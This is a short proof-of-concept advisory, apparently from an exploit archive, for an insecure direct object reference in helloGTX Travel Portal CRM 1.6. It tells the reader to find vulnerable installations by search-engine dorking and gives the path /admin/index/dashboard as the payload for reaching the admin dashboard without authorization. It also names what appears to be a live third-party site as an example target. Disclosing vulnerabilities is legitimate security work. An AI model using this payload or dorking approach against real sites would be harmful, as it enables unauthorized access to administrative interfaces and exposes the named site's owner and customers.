helloGTX Travel Portal CRM 1.6 Insecure Direct Object Reference

====================================================================================================================================| # Title     : helloGTX Travel Portal CRM v1.6 Insecure Direct Object Reference Vulnerability                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.hellogtx.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/index/dashboard[+] Watch only without editing[+] https://wwholidaysbookerscom/admin/index/dashboardGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================